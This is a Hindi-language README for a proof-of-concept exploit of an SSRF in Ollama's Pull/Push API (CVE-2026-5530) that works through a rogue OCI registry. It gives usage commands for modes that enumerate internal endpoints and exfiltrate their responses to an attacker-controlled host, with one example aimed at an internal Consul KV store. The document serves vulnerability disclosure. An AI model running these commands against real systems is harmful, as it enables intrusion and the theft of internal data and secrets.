
CVE-2026-5530 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Ollama के Pull/Push API में एक SSRF है, जो एक दुष्ट OCI रजिस्ट्री के माध्यम से आंतरिक एंडपॉइंट एन्यूमरेशन और पूर्ण प्रतिक्रिया एक्सफिल्ट्रेशन को सक्षम बनाता है।
OCI रजिस्ट्री रीडायरेक्ट के माध्यम से Ollama SSRF, पूर्ण प्रतिक्रिया निष्कासन (exfiltration) के साथ।
विवरण (Writeup): https://davidrochester.com/posts/cve-2026-5530
Ollama से कई बार संपर्क किया गया, लेकिन कोई प्रतिक्रिया नहीं मिली।
तीन मोड: enum, exfil, और probe।
Ollama होस्ट से पहुंच योग्य लाइव आंतरिक एंडपॉइंट्स खोजता है।
python3 poc.py targets.txt --registry-host <your-ip>
जब आप प्रतिक्रिया का आकार जानते हों, तो SSRF प्रतिक्रियाओं को निष्कासित (exfiltrate) करता है।
python3 poc.py http://internal:8500/v1/kv/?recurse --exfil --size 960 --registry-host <your-ip>
प्रतिक्रिया के आकार के लिए स्वचालित रूप से बाइनरी खोज करता है, फिर निष्कासित करता है।
python3 poc.py http://internal:8500/v1/kv/?recurse --probe --registry-host <your-ip>
target URL या URL की फ़ाइल (प्रति पंक्ति एक, टिप्पणियों के लिए #)
-p, --port दुष्ट रजिस्ट्री पोर्ट (डिफ़ॉल्ट: 9999)
--exfil-port निष्कासन रजिस्ट्री पोर्ट (डिफ़ॉल्ट: 10000)
--exfil निष्कासन मोड, --size की आवश्यकता है
--probe आकार के लिए बाइनरी खोज, फिर निष्कासन
--size Content-Length (--exfil के साथ आवश्यक)
--registry-host आपका हमलावर IP/होस्टनाम जिसे Ollama पहुंच सकता है
--ollama Ollama API URL (डिफ़ॉल्ट: http://127.0.0.1:11434)